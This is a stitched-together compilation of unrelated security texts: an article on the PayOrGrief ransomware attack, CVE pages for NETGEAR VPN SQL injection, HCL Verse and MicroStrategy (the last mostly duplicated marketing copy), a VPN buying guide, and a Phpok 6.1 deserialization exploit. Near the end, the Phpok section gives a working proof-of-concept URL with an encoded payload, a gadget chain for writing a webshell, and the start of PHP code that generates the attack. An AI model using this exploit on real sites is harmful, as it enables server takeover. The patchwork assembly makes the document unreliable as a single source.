The group that shut down the second largest city in Greece was not new but a relaunch of DoppelPaymer.

In July 2021, the second largest city in Greece fell victim to a cyberattack orchestrated by an apparently amateur ransomware group. PayOrGrief appeared to have existed for just a couple of weeks when it broke through Thessaloniki's security systems.

The group exfiltrated and encrypted numerous files before issuing a devastating $20 million ransom demand. Unsure of just how far the breach went, the municipality's security team was forced to shut down all of the Thessaloniki website's public-facing services and launch a full investigation into the breach before it could even consider whether to pay the immense ransom.

**Spot the Difference: PayOrGrief and DoppelPaymer  
**It didn't take long for PayOrGrief to gain a reputation for disruption. Its use of double extortion ransomware tactics has proved effective in targeting organizations in all kinds of industries, including numerous manufacturers and municipalities like Thessaloniki.

The novelty of PayOrGrief's operation made it easy for it to beat security tools based on historical attacks, particularly in those first few weeks. Security experts had their suspicions, however, that PayOrGrief was more than the latest budding group to join the ransomware scene. Its attack playbook suggested experience.

Further investigations more or less confirmed that PayOrGrief was not a new group but a rebrand of an older one called DoppelPaymer, which ended its operations in May 2021. With the new PayOrGrief moniker and a slightly shifted set of tactics, techniques, and procedures (TTPs), the group has seen success to the tune of over $10 million in ransom payments.

The success of the PayOrGrief rebrand demonstrates just how easily a group can obscure itself from the sight of tools based on historical data. Altering its TTPs allowed PayOrGrief to beat security tools, but these changes were far from substantial, and for analysts the DoppelPaymer playbook was still plain to see.

**How PayOrGrief Orchestrates an Attack  
**This playbook was thrown open when, in July 2021, PayOrGrief targeted a European manufacturing company. The company in question had deployed Darktrace's self-learning artificial intelligence (AI) technology, which was continuously updating its understanding of the digital business and looking for anomalous behavior indicative of a threat. This technology was able to reveal the life cycle of PayOrGrief's attack.

PayOrGrief often begins its attacks with phishing emails containing fake updates or malicious documents through which it can inject malware strains like Dridex into target devices. In this case, four devices were compromised, likely by a single phishing campaign, and began to make command-and-control (C2) connections to several rare external IPs.

These connections, encrypted with an invalid SSL certificate, were followed by a 50MB upload of data to the company's corporate server. With this escalated position, the attackers established keep-alive beacons and were then ready to begin the exfiltration stage of this double extortion ransomware attack.

    

AI-generated summary of the incident, showing the data exfiltration from a single device. (Source: Darktrace)

In just a few hours, over 100GB of data was exfiltrated via HTTPS to the file storage platform Mega. The attackers had targeted more than this, but the company's autonomous defenses stood in their way.

Having recognized that this behavior was highly unusual in the context of the business' normal "pattern of life," the AI could have stopped the threat at its earliest stages if not mostly blocked from intervening by the company's configuration settings. The AI took what limited action it had permission to and limited the scope of the data exfiltration. By detecting and blocking anomalous file activity, it obstructed some of the exfiltration efforts, while continuing to monitor those parts of the digital estate in which it couldn't take direct action.

The attackers continued to move laterally through the digital estate, using RDP and SMB for internal reconnaissance and exploiting administrative privileges and processes. And then, only 10 hours after the first compromised devices began making malicious connections, PayOrGrief deployed its ransomware.

Encryption spread through the company, with an SMB write with the ".pay0rgrief" file extension seen on 137 devices. Once again, the AI cybersecurity system was able to protect certain devices from anomalous file activities and narrow the scope of the attack considerably. Through each stage of the attack — including C2, lateral movement, internal reconnaissance, exfiltration, and encryption — the AI suggested actions to block specific connections and enforce devices' patterns of life in order to halt the threat without disrupting the business itself.

**Stopping the Next Big Name in Ransomware  
**PayOrGrief is no longer an unfamiliar name, a fact that will now be reflected in the OSINT of many rules-based cybersecurity solutions. But if organizations continue with this approach, looking at historical attacks and playing continual catch-up with the latest ransomware strains and TTPs, they will always be vulnerable to whatever is coming next. As the speed and efficacy of the DoppelPaymer rebrand demonstrates, focusing on the specificities of the attacker is a short-sighted solution.

Businesses should instead adopt cybersecurity tools that stop threats regardless of whether they have been seen before. By continuously updating their understanding of how your business should behave normally, AI-driven solutions like Darktrace can piece together anomalies to detect emerging attacks and even take autonomous action to stop them. That means no matter what they call themselves, or how they operate, attackers will be seen for what they are — and stopped.

How to Avoid Falling Victim to PayOrGrief's Next Rebrand

NETGEAR ProSafe SSL VPN firmware FVS336Gv2 and FVS336Gv3 was discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.

main

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

badboycxcc Update README.md

903e218

May 14, 2022

Update README.md

903e218

**Git stats**

*   **18** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

FSV336G-0.png

Add files via upload

Feb 10, 2022

FVS336G-1.png

Add files via upload

Feb 10, 2022

FVS336G-2.png

Add files via upload

Feb 10, 2022

README.md

Update README.md

May 14, 2022

Netgear-ssl-vpn-20211222 CVE-2022-29383 NETGEAR ProSafe SSL VPN SQL injection vulnerability exists in scgi-bin/platform.cgi Firmware version： FVS336Gv2 - FVS336Gv3 sqlmap command SQL Injection Vulnerability : USERDBDomains.Domainname

**README.md**

**Netgear-ssl-vpn-20211222****CVE-2022-29383****NETGEAR ProSafe SSL VPN SQL injection vulnerability exists in scgi-bin/platform.cgi****Firmware version： FVS336Gv2 - FVS336Gv3**

**sqlmap command**

**SQL Injection Vulnerability : USERDBDomains.Domainname**

CVE-2022-29383: GitHub - badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383

main

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

**Git stats**

*   **17** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

FSV336G-0.png

FVS336G-1.png

FVS336G-2.png

README.md

Netgear-ssl-vpn-20211222 NETGEAR ProSafe SSL VPN SQL injection vulnerability exists in scgi-bin/platform.cgi Firmware version： FVS336Gv2 - FVS336Gv3 sqlmap command SQL Injection Vulnerability : USERDBDomains.Domainname

**README.md**

**Netgear-ssl-vpn-20211222****NETGEAR ProSafe SSL VPN SQL injection vulnerability exists in scgi-bin/platform.cgi****Firmware version： FVS336Gv2 - FVS336Gv3**

**sqlmap command**

**SQL Injection Vulnerability : USERDBDomains.Domainname**

CVE-2022-29383: GitHub - badboycxcc/Netgear-ssl-vpn-20211222

Using the ability to perform a Man-in-the-Middle (MITM) attack, which indicates a lack of hostname verification, sensitive account information was able to be intercepted. In this specific scenario, the application's network traffic was intercepted using a proxy server set up in 'transparent' mode while a certificate with an invalid hostname was active. The Android application was found to have hostname verification issues during the server setup and login flows; however, the application did not process requests post-login.

 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2021-27768: Security Bulletin: An SSL certificate host verification vulnerability affects HCL Verse for Android (CVE-2021-27768)

By Waqas
A VPN these days is a must as we know it. The recent growth of VPN use has…
This is a post from HackRead.com Read the original post: A Guide to Using VPNs on Your Smartphone

A VPN these days is a must as we know it. The recent growth of VPN use has been pronounced across the globe, particularly in developed economies in the UK and the US.

On these shores, some 44% of UK Internet users (62.86 million people as of December 2021) have used a VPN at some point when online, while 41% of Brits use this type of private network at least once a week.

It’s also clear that VPN use is particularly popular among younger people and smartphone users, with 52% of VPN customers utilizing an iOS device to browse securely online. **_With this in mind, we’ve created a detailed guide to help you use VPNs effectively on your smartphone (regardless of your chosen operating system)._**

**First Up – What is a VPN?**

A VPN describes a virtual private network that can be securely opened within a **_public_** network connection, enabling users to send, receive and access content with true anonymity and peace of mind.

**But how exactly does a VPN work? **

Well, it effectively creates a virtual encrypted tunnel between two servers, presenting any data sent from a protected device as a random and completely indecipherable string of code.

In addition to encrypting your content, a VPN also masks the sender’s unique IP address and real-time location, making this information invisible to anyone else who may be on the network (including the manager). 

Typically, VPNs are used to hide your geographical location and access restricted content libraries available through streaming platforms like Netflix. The content available through this type of platform will vary from one jurisdiction to another, thanks largely to licensing agreements and any associated restrictions that are in place.

With a VPN, however, you can mask your precise location and access content without such restrictions, allowing you to enjoy the full Netflix library wherever you may be in the world.

**OK, But Why Do I Need a VPN on my Android or iOS Device?**

Typically, VPNs are synonymous with PC and laptop usage, but as we’ve already touched on, they’re increasingly popular among Android and iOS owners. **_This also applies to the streaming of content and live broadcasts, with mobile fast becoming our go-to channel for accessing our favorite shows._**

This trend is prevalent in both the UK and the US, with 71% of streaming viewers stateside now regularly accessing content on at least two devices (primarily smartphones and CTV). Both devices are considerably more popular than PCs for streaming content in the digital age, so Android and iOS users are increasingly likely to use a VPN to enjoy unrestricted content libraries from across the globe.

This is certainly true among travelers, who are even more likely to stream content through their smartphone of choice when heading overseas. Depending on where you’re traveling, however, you’ll find various restrictions in place, from complete blocks on social media sites like Instagram or Facebook to reduced Netflix libraries with a distinct absence of your favorite shows.

Censorship issues may also prevent you from accessing certain subscription-based video services, but the use of a VPN for Android or iOS can overcome these in a completely secure and legal way.

**_Interestingly, there are other_** **_benefits of installing the best VPN for your Android_** **_or iOS device._** 

After all, the ability of VPNs to encrypt any data that’s sent out over a network makes it incredibly difficult for hackers to intercept such information, while the mere practice of hiding your IP address and locations makes you less vulnerable to malware and DDoS (Delivery of Service) attacks. 

When you consider the prevalence of tasks such as mobile banking (approximately 50% of adults in the UK regularly use this service and 68% do so on an occasional basis), the need to send out personal information securely and protect login information on smartphones is more pressing than ever before.

**_This is especially true when connecting to public Internet connections through your smartphone when out and about._** 

While on the move, for example, you may find that 4G or even 5G connections may be inconsistent or patchy in certain locations. You can negate this by logging into a public Wi-Fi access point at a local coffee shop or retail outlet, but this type of connection is inherently insecure and vulnerable to the machinations of hackers.

Hackers can certainly create familiar-sounding access points on such networks, through which they can monitor your activity and access potentially sensitive information once you’ve logged in with your smartphone.

Installing a VPN can establish a secure and private connection on a public network, however, meaning that even people who gain access to the network will be unable to view your activity or capture login details and passwords.

On a similar note, a mobile VPN safeguards your privacy and prevents your Internet Service Provider (ISP) from viewing your online activity. The same principle applies to other websites and services that tend to track browsing habits, such as Google and Facebook.

In simple terms, a VPN ensures that you’re constantly accessing websites in private browsing mode, as nobody else active on your network can see what you’re doing or access the content that you’re sharing.

At this stage, it should be noted that while VPNs create relative security and anonymity when using a mobile web browser or app, it **_doesn’t_** prevent website cookies from tracking you and your browsing activity.

However, the capacity of the best Android or iOS VPNs to connect with a vast choice of foreign servers and hide your IP address can feed false information to tracking cookies, creating an additional layer of anonymity when online.

**Choosing a VPN Provider for Your Mobile – The Key Considerations**

If you **_do_** decide to install a reputable VPN on your smartphone, the question that remains is how to choose from the huge range of service providers available in the contemporary marketplace?

The good news is that there are several criteria on which you can base your decision, and we’ve outlined some of these in greater detail below. **_So, let’s get into it!_**

*   **Is the VPN Connection Secure:** This is a basic consideration, but it’s important to ensure that your VPN service provider offers a secure encryption method and strong protocol. In general terms, a secure VPN should utilize 256-bit encryption and OpenVPN protocol (which works on all major operating systems and is particularly effective when bypassing firewalls). Other popular protocols include WireGuard and IKEv2, and checking this information will help you to make an informed decision.

*   **Does the Provide Offer Good Coverage:** There are instances where a VPN can increase latency and slow your Internet connection, especially when providers don’t have broad coverage or multiple server locations. So, you’ll need to prioritize VPN service providers like Surfshark, which currently has over 3,200 servers located in 65 countries across the globe. **_This way, you can access the benefits of a VPN and maintain a consistent connection even when traveling._**

*   **Is There Flexible Pricing Available?:** This is another key consideration, both in terms of the total cost of subscription and the range of payment options provided. After all, you won’t necessarily need to use a VPN all of the time, so you’ll want to consider service providers that offer variable payment plans that cover different time frames. Similarly, you should note that the average VPN subscription costs around $3 per month, so keep this in mind when comparing the market’s prices.

*   **Does the VPN Provider Log Your Activity:** If your primary goal for using a VPN is privacy, you should bear in mind that some service providers keep logs of your activity. This is incredibly counterintuitive, so we’d recommend checking the privacy policies of individual products and reviewing these in detail to see their approach to tracking and usage. This way, you’ll be able to identify a level of privacy that you’re completely comfortable with.

**Setting Up a VPN on Your Smartphone**

Once you’ve identified a viable service provider, the next step is to establish the VPN connection on your iPhone or Android handset.

There are two primary ways to do this, the most popular of which is the most accessible and known for being incredibly user-friendly. To do this, you’ll simply need to purchase a native iteration of the app in the Google Play or Apple store before downloading it and following the individual setup instructions.

Most reputable VPN providers feature native apps on both iOS and Android, while they also simplify the process of saving installation preferences and maintaining (and updating) the applications over time.

The second option is to set up a VPN manually on your smartphone, with this considerably more time-consuming and reliant on you having some kind of knowledge and industry understanding.

However, it also affords you much greater control over your online experience when using a VPN, particularly in terms of the fundamental settings, the scope for customization, and the ability to select your preferred protocol. **_Below, we’ve listed some of the most popular and secure protocols available, including the aforementioned OpenVPN option:_**

*   **OpenVPN:** As we’ve already touched on, this highly configurable, open-source platform is compatible with 256-bit encryption and incredibly effective when bypassing firewalls. It’s also ideal when working with either Android or iOS operating systems, even though it isn’t natively supported on any particular platform. However, the latter point means that you’ll have to install the platform on your smartphone through a third party (which requires additional expertise and knowledge).

*   **WireGuard:** WireGuard is another highly popular and secure VPN protocol and one that only supports UDP (User Datagram Protocol). However, it benefits from incredibly high-speed cryptographic primitives and deep integration with an underlying OS kernel, which translates into high speeds and relatively low overheads. WireGuard delivers higher speeds than those associated with OpenVPN, so you should keep this in mind if it’s a key priority.

*   **IKEv2:** This protocol deserves to be referenced in conjunction with the first two protocols, as it’s similarly popular and boasts impressive speed and security. It’s also particularly compatible with mobile usage, as it can seamlessly shift from one connection type to another (like mobile Internet to Wi-Fi) without compromising security or performance. However, IKEv2 isn’t as widely supported as the first two protocols on our list, while it also lacks standalone encryption and must be installed alongside the IPSec protocol.

*   **IPSec (and L2TP):** While IPSec can be deployed as a standalone protocol, it’s commonly used in conjunction with Layer 2 Tunnel Protocol (L2TP). When combined, these protocols create an easy-to-install and secure option that’s supported natively across a broad range of operating systems including Android and iOS. However, its use of a single port (UDP port 500) makes it easier to block by robust firewalls, making it a less popular and viable option than OpenVPN.

*   **PPTP:** This refers to the ‘Point-to-Point Tunnelling’ protocol, which is supported by the vast majority of operating systems and was first developed by Microsoft during the 90s. While the protocol is still considered to be one of the quickest on the list, it’s also one of the least secure in an age of mobile devices and operating systems. **_Because of this, it’s no longer natively supported by iOS, so it’s not an ideal choice if security is your main priority when surfing online._**

**The Bottom Line**

As we can see, there are various options and protocols to suit the different priorities of smartphone users, whether you want a fast VPN connection or one that offers native operating system support or increased security.

Regardless of your eventual choice, however, there’s no doubt that a mobile VPN is an increasingly valuable tool in an age where smartphones have become a functional and often indispensable part of our everyday lives.

Make no mistake; a VPN can help to secure your most private datasets and make you less vulnerable to certain malware and DDoS attacks. It also helps you to maintain your privacy online, especially when browsing on the move and logging into public networks.

**_It’s also incredibly easy to install and use a mobile VPN on both iOS and Android platforms, so you can take steps to protect yourself even if you’re not the most tech-savvy individual._**

A Guide to Using VPNs on Your Smartphone 

Cross-Site Scripting (XSS) vulnerability in MicroStrategy Web SDK 10.11 and earlier, allows remote unauthenticated attackers to execute arbitrary code via key parameter to the getGoogleExtraConfig task.

**Get to Know MicroStrategy**

Our company vision is intelligence everywhere. Our analytics platform delivers answers, and gets results. Our entire company is committed to your success.

**Pilot Enterprise Analytics**

Quickly deploy consumer-grade BI experiences for every role, on any device, with the platform that provides sub-second response at enterprise scale.

**Make your applications intelligent with Embedded Analytics**

Deliver in-context insights and analysis in any application and on any device. 

**Drive more value with MicroStrategy Cloud    **

Drive digital transformation and scale with confidence.

**Success Stories**

Hear stories from our customers and partners about how they use MicroStrategy to be a more Intelligent Enterprise.

**Featured Customer: Sainsbury's**

Learn how leading UK retailer Sainsbury’s democratized its data to empower every colleague from the store floor to the C-suite, powered by MicroStrategy.

**Featured Customer: Schwarz Group**

Explore how Schwarz IT enables brands like Lidl and Kaufland to drive global business impact with an enterprise analytics strategy, powered by MicroStrategy.

**Featured Customer: NICE**

Discover how AI-powered innovation and cloud-native technologies help NICE deliver the world’s leading cloud CX platform, with data and analytics visualization from MicroStrategy.

**Find Solutions with MicroStrategy**

Build consumer-grade intelligence applications, empower users with data discovery, and seamlessly push content to employees, partners, and customers in minutes.

01:30

**Overview of the MicroStrategy Platform**

Discover the power of MicroStrategy, the modern, open, enterprise BI platform that delivers intelligence everywhere. Watch this overrview to learn everything you need to know.

37753 views · April 01, 2021

31:41

**Data Storytelling with Dossiers**

Did you know you can easily build no-code analytics applications with MicroStrategy Dossiers? In this session from MicroStrategy World 2022, experts introduced the art of data storytelling.

960 views · February 02, 2022

08:57

**Overview of MicroStrategy Mobile**

Watch the MicroStrategy team review how to integrate context-rich analytics and collaborative workflows with powerful no-code mobile applications. Learn more about traditional mobile applications from the MicroStrategy platform.

3727 views · September 22, 2020

06:27

**Trusted Data for Excel, BI Tools, and Data Science Tools**

Leverage the power of the industry's strongest semantic graph. Watch this to learn how MicroStrategy will help you get the most out of Excel and other BI applications. The tools you love, with data you can trust.

4052 views · September 22, 2020

**HyperIntelligence**

Deploy analytics beyond the analyst by injecting insights and actions into the applications and websites your people use every day.

00:44

**Introduction to HyperIntelligence**

With HyperIntelligence, deliver instant insights into your everyday applications with no code to make informed decisions and take action faster.

26031 views · November 18, 2019

**Embedded Intelligence**

Learn about MicroStrategy's #1 rated platform for Embedded Analytics.

01:00

**Make your Applications Intelligent with Embedded Analytics**

MicroStrategy’s #1-rated Embedded Analytics platform provides faster in-context insights and analysis in any application and on any device. Extend analytics into portals and applications, allowing users to take advantage of actionable insights in their day-to-day workflows.

1007 views · October 14, 2021

11:35

**Overview of MicroStrategy Embedded Analytics**

MicroStrategy is the industry leader for application development and embedded analytics. Watch this video to learn more about the functionality related to customization and embedded analytics.

4023 views · May 29, 2020

**Cloud Intelligence**

The fastest, most efficient way to run your Intelligent Enterprise.

03:01

**What to Expect From Your Cloud Migration**

"Learn how you’ll collaborate with our MicroStrategy experts to ensure easy and efficient migration to the cloud—in a matter of weeks with no disruption to your users. "

681 views · June 22, 2021

43:31

**Top Trends: The Future of Cloud Computing**

Explore the top cloud trends on the horizon and learn to leverage robust application and infrastructure security to ensure integrity across a robust suite of analytics applications.

81 views · February 02, 2022

**Resources**

**Partners**

16:23

**Exasol: Turbocharging the BI Stack**

This session showcases how to accelerate time to insights and how to future-proof your MicroStrategy environment by adding Exasol to your data stack.

40 views · February 10, 2022

CVE-2020-22984: Business Intelligence & Analytics Solutions

**Get to Know MicroStrategy**

Our company vision is intelligence everywhere. Our analytics platform delivers answers, and gets results. Our entire company is committed to your success.

**Pilot Enterprise Analytics**

Quickly deploy consumer-grade BI experiences for every role, on any device, with the platform that provides sub-second response at enterprise scale.

**Make your applications intelligent with Embedded Analytics**

Deliver in-context insights and analysis in any application and on any device. 

**Drive more value with MicroStrategy Cloud    **

Drive digital transformation and scale with confidence.

**Success Stories**

Hear stories from our customers and partners about how they use MicroStrategy to be a more Intelligent Enterprise.

**Featured Customer: Sainsbury's**

Learn how leading UK retailer Sainsbury’s democratized its data to empower every colleague from the store floor to the C-suite, powered by MicroStrategy.

**Featured Customer: Schwarz**

Explore how Schwarz IT enables brands like Lidl and Kaufland to drive global business impact with an enterprise analytics strategy, powered by MicroStrategy.

**Featured Customer: NICE**

Discover how AI-powered innovation and cloud-native technologies help NICE deliver the world’s leading cloud CX platform, with data and analytics visualization from MicroStrategy.

**Find Solutions with MicroStrategy**

Build consumer-grade intelligence applications, empower users with data discovery, and seamlessly push content to employees, partners, and customers in minutes.

01:30

**Overview of the MicroStrategy Platform**

Discover the power of MicroStrategy, the modern, open, enterprise BI platform that delivers intelligence everywhere. Watch this overrview to learn everything you need to know.

36959 views · April 01, 2021

31:41

**Data Storytelling with Dossiers**

Did you know you can easily build no-code analytics applications with MicroStrategy Dossiers? In this session from MicroStrategy World 2022, experts introduced the art of data storytelling.

927 views · February 02, 2022

08:57

**Overview of MicroStrategy Mobile**

Watch the MicroStrategy team review how to integrate context-rich analytics and collaborative workflows with powerful no-code mobile applications. Learn more about traditional mobile applications from the MicroStrategy platform.

3703 views · September 22, 2020

06:27

**Trusted Data for Excel, BI Tools, and Data Science Tools**

Leverage the power of the industry's strongest semantic graph. Watch this to learn how MicroStrategy will help you get the most out of Excel and other BI applications. The tools you love, with data you can trust.

4007 views · September 22, 2020

**HyperIntelligence**

Deploy analytics beyond the analyst by injecting insights and actions into the applications and websites your people use every day.

00:44

**Introduction to HyperIntelligence**

With HyperIntelligence, deliver instant insights into your everyday applications with no code to make informed decisions and take action faster.

25983 views · November 18, 2019

**Embedded Intelligence**

Learn about MicroStrategy's #1 rated platform for Embedded Analytics.

01:00

**Make your Applications Intelligent with Embedded Analytics**

MicroStrategy’s #1-rated Embedded Analytics platform provides faster in-context insights and analysis in any application and on any device. Extend analytics into portals and applications, allowing users to take advantage of actionable insights in their day-to-day workflows.

925 views · October 14, 2021

11:35

**Overview of MicroStrategy Embedded Analytics**

MicroStrategy is the industry leader for application development and embedded analytics. Watch this video to learn more about the functionality related to customization and embedded analytics.

3944 views · May 29, 2020

**Cloud Intelligence**

The fastest, most efficient way to run your Intelligent Enterprise.

03:01

**What to Expect From Your Cloud Migration**

"Learn how you’ll collaborate with our MicroStrategy experts to ensure easy and efficient migration to the cloud—in a matter of weeks with no disruption to your users. "

666 views · June 22, 2021

43:31

**Top Trends: The Future of Cloud Computing**

Explore the top cloud trends on the horizon and learn to leverage robust application and infrastructure security to ensure integrity across a robust suite of analytics applications.

79 views · February 02, 2022

**Resources**

**Partners**

16:23

**Exasol: Turbocharging the BI Stack**

This session showcases how to accelerate time to insights and how to future-proof your MicroStrategy environment by adding Exasol to your data stack.

39 views · February 10, 2022

Phpok v6.1 was discovered to contain a deserialization vulnerability via the update_f() function in login_control.php. This vulnerability allows attackers to getshell via writing arbitrary files.

The update method in the login controller of the admin module calls the decode method and calls unserialize in the decode function

poc:http://127.0.0.1/61/admin.php?c=login&f=update&fid=../index&fcode=admin&quickcode=cefe25SOUEa4gCpoIv%2BJt%2F5z6u31tiK52nSRBk5hdcE2RBSYok%2B16JUHTY2n6QLMYal2lrFTkM5Os27Hn4Ho0QPtj1%2F8q2%2FrfShLLljvUGCdsPgQITemOZnBayJugy32PTPq2Jb056hKp04YfhZbymkHkBRv1c6dMcanU1shtbl46I0xgaskKvpoMp5YCH2WnVNziBbHCks11vpoXScgZrX1sqTCWaZ5m9Z04eaDJGWCQG3hVzNy3lC27cvVocS1ed0OP0K%2B9k0MfSNcTc0IUlEsZmQt1QY6Y%2FC4nm41IVgrcwXakwGLoR%2BvttyospEjAu0P%2BE8eo

analyze：

For this payload, we can use the cache class, whose \_\_destruct method calls the save method, and the save method can write to the webshell：

The exit here can be bypassed through the pseudo-protocol of php：

php file successfully written and executed：

When executing the following file to generate an attack chain, put index.php in the same directory:  
\`<?php

class token\_lib  
{  
private $keyid = '';  
private $keyc\_length = 6;  
private $keya;  
private $keyb;  
private $time;  
private $expiry = 3600;  
private $encode\_type = 'api\_code'; //仅支持 api\_code 和 public\_key  
private $public\_key = '';  
private $private\_key = '';

    public function __construct()
    {
    	$this->time = time();
    }
    
    
    public function etype($type="")
    {
    	if($type && in_array($type,array('api_code','public_key'))){
    		$this->encode_type = $type;
    	}
    	return $this->encode_type;
    }
    
    public function public_key($key='')
    {
    	if($key){
    		$this->public_key = $key;
    	}
    	return $this->public_key;
    }
    
    public function private_key($key='')
    {
    	if($key){
    		$this->private_key = $key;
    	}
    	return $this->private_key;
    }
    
    /**
     * 自定义密钥
     * @参数 $keyid 密钥内容
    **/
    public function keyid($keyid='')
    {
    	if(!$keyid){
    		return $this->keyid;
    	}
    	$this->keyid = strtolower(md5($keyid));
    	$this->config();
    	return $this->keyid;
    }
    
    private function config()
    {
    	if(!$this->keyid){
    		return false;
    	}
    	$this->keya = md5(substr($this->keyid, 0, 16));
    	$this->keyb = md5(substr($this->keyid, 16, 16));
    }
    
    /**
     * 设置超时
     * @参数 $time 超时时间，单位是秒
    **/
    public function expiry($time=0)
    {
    	if($time && $time > 0){
    		$this->expiry = $time;
    	}
    	return $this->expiry;
    }
    
    /**
     * 加密数据
     * @参数 $string 要加密的数据，数组或字符
    **/
    public function encode($string)
    {
    	if($this->encode_type == 'public_key'){
    		return $this->encode_rsa($string);
    	}
    	if(!$this->keyid){
    		return false;
    	}
    	$string = serialize($string);
    	$expiry_time = $this->expiry ? $this->expiry : 365*24*3600;
    	$string = sprintf('%010d',($expiry_time + $this->time)).substr(md5($string.$this->keyb), 0, 16).$string;	
    	$keyc = substr(md5(microtime().rand(1000,9999)), -$this->keyc_length);
    	$cryptkey = $this->keya.md5($this->keya.$keyc);
    	$rs = $this->core($string,$cryptkey);
    	return $keyc.str_replace('=', '', base64_encode($rs));
    }
    
    /**
     * 基于公钥加密
    **/
    private function encode_rsa($string)
    {
    	if(!$this->public_key){
    		return false;
    	}
    	$string = serialize($string);
    	$crypto = '';
    	$tlist = str_split($string,117);
    	foreach($tlist as $key=>$value){
    		openssl_public_encrypt($value,$data,$this->public_key);
    		$crypto .= $data;
    	}
    	return base64_encode($crypto);
    }
    
    /**
     * 解密
     * @参数 $string 要解密的字串
    **/
    public function decode($string)
    {
    	if($this->encode_type == 'public_key'){
    		return $this->decode_rsa($string);
    	}
    	if(!$this->keyid){
    		return false;
    	}
    	$string = str_replace(' ','+',$string);
    	$keyc = substr($string, 0, $this->keyc_length);
    	$string = base64_decode(substr($string, $this->keyc_length));
    	$cryptkey = $this->keya.md5($this->keya.$keyc);
    	$rs = $this->core($string,$cryptkey);
    	$chkb = substr(md5(substr($rs,26).$this->keyb),0,16);
    	if((substr($rs, 0, 10) - $this->time > 0) && substr($rs, 10, 16) == $chkb){
    		$info = substr($rs, 26);
    		return unserialize($info);
    	}
    	return false;
    }
    
    /**
     * 基于私钥解密
    **/
    public function decode_rsa($string)
    {
    	if(!$this->private_key){
    		return false;
    	}
    	$crypto = '';
    	$tlist = str_split(base64_decode($string),128);
    	foreach($tlist as $key=>$value){
    		openssl_private_decrypt($value,$data,$this->private_key);
    		$crypto .= $data;
    	}
    	if($crypto){
    		return unserialize($crypto);
    	}
    	return false;
    }
    
    private function core($string,$cryptkey)
    {
    	$key_length = strlen($cryptkey);
    	$string_length = strlen($string);
    	$result = '';
    	$box = range(0, 255);
    	$rndkey = array();
    	// 产生密匙簿
    	for($i = 0; $i <= 255; $i++){
    		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
    	}
    	// 用固定的算法，打乱密匙簿，增加随机性，好像很复杂，实际上并不会增加密文的强度
    	for($j = $i = 0; $i < 256; $i++){
    		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
    		$tmp = $box[$i];
    		$box[$i] = $box[$j];
    		$box[$j] = $tmp;
    	}
    	// 核心加解密部分
    	for($a = $j = $i = 0; $i < $string_length; $i++){
    		$a = ($a + 1) % 256;
    		$j = ($j + $box[$a]) % 256;
    		$tmp = $box[$a];
    		$box[$a] = $box[$j];
    		$box[$j] = $tmp;
    		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    	}
    	return $result;
    }
    

}

class file\_lib  
{  
public $read\_count;  
private $safecode = "\\n";  
public function \_\_construct()  
{  
$this->read\_count = 0;  
}

    /**
     * 远程获取内容，这里直接调用html类来执行
     * @参数 $url 网址
     * @参数 $post 要提交的post数据
    **/
    public function remote($url,$post='')
    {
    	return $GLOBALS['app']->lib('html')->get_content($url,$post);
    }
    
    /**
     * 读取数据
     * @参数 $file 要读取的文件，支持远程文件
     * @参数 $length 文件长度，为空表示读取全部，仅限本地文件有效
     * @参数 $filter 是否过滤安全字符，默认为true，不过滤请传参false，仅限本地文件有效
     * @返回 false 或 文件内容
    **/
    public function cat($file="",$length=0,$filter=true)
    {
    	if(!$file){
    		return false;
    	}
    	if(strpos($file,"://") !== false && strpos($file,'file://') === false){
    		return $this->remote($file);
    	}
    	if(!file_exists($file)){
    		return false;
    	}
    	$this->read_count++;
    	
    	if($length && is_numeric($length)){
    		$maxlength = $length;
    		if($filter){
    			$maxlength = $length + strlen($this->safecode);
    		}
    		$fp = fopen($file,'rb');
    		if(!$fp){
    			return false;
    		}
    		$content = fread($fp,$maxlength);
    		fclose($fp);
    	}else{
    		$content = file_get_contents($file);
    	}
    	if(!$content){
    		return false;
    	}
    	if($filter || (is_bool($length) && $length)){
    		$content = str_replace($this->safecode,'',$content);
    	}
    	return $content;
    }
    
    /**
     * 保存数据
     * @参数 $content 要保存的内容，支持字符串，数组，多维数组等
     * @参数 $file 保存的文件地址
     * @参数 $var 仅限$content为数组，此项不为空时使用
     * @参数 $type 写入方式，默认为wb，清零写入
     * @返回 true/false
    **/
    public function vi($content='',$file='',$var="",$type="wb")
    {
    	if(!$content || !$file){
    		return false;
    	}
    	$this->make($file,"file");
    	if(is_array($content) && $var){
    		$content = $this->__array($content,$var);
    		$safecode = 'if(!defined("PHPOK_SET")){exit("<h1>Access Denied</h1>");}';
    		$content = "<?php\n".$safecode."\n".$content."\n//-----end";
    	}else{
    		if(strtolower($type) == 'wb' || strtolower($type) == 'w'){
    			$content = $this->safecode.$content;
    		}
    	}
    	$this->_write($content,$file,$type);
    	return true;
    }
    
    /**
     * 存储php等源码文件，不会写入安全保护
     * @参数 $content 要保存的内容
     * @参数 $file 保存的地址
     * @参数 $type 写入模式，wb 表示完全写入，ab 表示追加写入
    **/
    public function vim($content,$file,$type="wb")
    {
    	$this->make($file,"file");
    	return $this->_write($content,$file,$type);
    }
    
    /**
     * 保存数据别名，不改写任何东西
     * @参数 $content 要保存的内容
     * @参数 $file 保存的地址
     * @参数 $type 写入模式，wb 表示完全写入，ab 表示追加写入
    **/
    public function save($content,$file,$type='wb')
    {
    	return $this->vim($content,$file,$type);
    }
    
    /**
     * 存储图片，内容不进行stripslashes处理
     * @参数 $content 要保存的内容
     * @参数 $file 要保存的文件
     * @返回 
     * @更新时间 
    **/
    public function save_pic($content,$file)
    {
    	$this->make($file,"file");
    	$handle = $this->_open($file,"wb");
    	fwrite($handle,$content);
    	unset($content);
    	$this->_close($handle);
    	return true;
    }
    
    /**
     * 删除操作，请一定要小心，在程序中最好严格一些，不然有可能将整个目录删掉
     * @参数 $del 要删除的文件或文件夹
     * @参数 $type 仅支持file和folder，为file时仅删除$del文件，如果$del为文件夹，表示删除其下面的文件。为folder时，表示删除$del这个文件，如果为文件夹，表示删除此文件夹及子项
     * @返回 true/false
    **/
